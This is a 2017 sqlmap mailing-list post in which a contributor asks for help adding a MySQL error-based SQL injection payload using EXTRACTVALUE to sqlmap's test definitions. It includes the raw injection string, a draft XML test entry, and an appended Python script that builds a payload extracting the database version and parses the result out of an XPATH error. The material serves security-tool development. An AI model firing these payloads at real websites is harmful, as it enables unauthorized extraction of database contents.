[sqlmap-users] help implement new payload for error based sqli using extractvalue()
From: daniel <ana...@pr...> - 2017-02-14 01:09:13
Hi all.. first time sending an e-mail to the list =)
My name is daniel, I'm new to contributing to the project..
I'm trying to implement this kind of payload for the error-based method for MySQL, but I'm having some problems..
The payload i want to implement is:
file.php?id=1 and extractvalue(0x0a,concat(0x0a,(query)))--+
I know that 0x0a is the "ENTER" but it can be changed to other chars.. so I replaced it with ':' .. that would be 0x3a
I found the error_based.xml file, and I tried some modifications but it keeps not getting the expected results.. I'm trying like this:
    <test>
        <title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
        <stype>2</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND EXTRACTVALUE(':',CONCAT(':',([QUERY])))</vector>
        <request>
            <!-- These work as good as ELT(), but are longer
            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
            -->
            <payload>and extractvalue(0x3a,concat(':',(select '[DELIMITER_STOP]')))</payload>
        </request>
        <response>
            <grep>':'(?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>>= 5.1</dbms_version>
        </details>
    </test>
And I don't want to test for WHERE, HAVING or ORDER BY... just with AND..
Sorry for my bad English, hope you could understand =)
best regards,
daniel.
github.com/chr0n1c
Sent from [ProtonMail](https://protonmail.com), Swiss-based encrypted email.
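As an added example (not sqlmap's own code and not part of daniel's post), the script below parses a test entry written in the same format as the one quoted above, substitutes the bracket placeholders, and applies the resolved <grep> regex to a MySQL XPATH error message. The delimiter values, the RANDNUM, the query and the response body are all constructed for the demonstration.

```python
"""Resolve an sqlmap-style error-based <test> entry and run its <grep> over a
constructed MySQL XPATH error. Added example; not sqlmap's own code."""
import re
import xml.etree.ElementTree as ET

# Test entry modelled on the format quoted in the post. Inside XML the regex's
# named group must be written (?P&lt;result&gt;...) or the parser sees a <result> tag.
TEST_XML = """
<test>
  <title>MySQL &gt;= 5.1 AND error-based (EXTRACTVALUE)</title>
  <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
  <response>
    <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
  </response>
</test>
"""

def load_test(xml_text):
    """Return (vector, grep) from a <test> element; ET unescapes &lt;/&gt; for us."""
    root = ET.fromstring(xml_text)
    return root.findtext("vector"), root.findtext("response/grep")

def resolve(template, randnum, start, stop, query=None):
    """Substitute the bracket placeholders the payload files use."""
    out = template.replace("[RANDNUM]", str(randnum))
    out = out.replace("[DELIMITER_START]", start).replace("[DELIMITER_STOP]", stop)
    return out if query is None else out.replace("[QUERY]", query)

def extract(grep_template, start, stop, body):
    """Apply the resolved <grep> to a response body; None when the markers are absent."""
    pattern = resolve(grep_template, 0, re.escape(start), re.escape(stop))
    match = re.search(pattern, body, re.DOTALL)
    return match.group("result") if match else None

def demo():
    """One round trip with fixed delimiters (sqlmap picks random ones per run)."""
    start, stop = "qxjxq", "qzbbq"  # constructed markers
    vector, grep = load_test(TEST_XML)
    payload = resolve(vector, 5123, start, stop, query="SELECT VERSION()")
    # Constructed response body in the shape of MySQL's XPATH error, which echoes
    # the string argument back when it is not a valid XPath expression.
    body = "<html>Warning: XPATH syntax error: '\\qxjxq5.7.21-logqzbbq' in file.php</html>"
    return payload, extract(grep, start, stop, body)

if __name__ == "__main__":
    built, value = demo()
    print("payload:", built)
    print("extracted:", value)
```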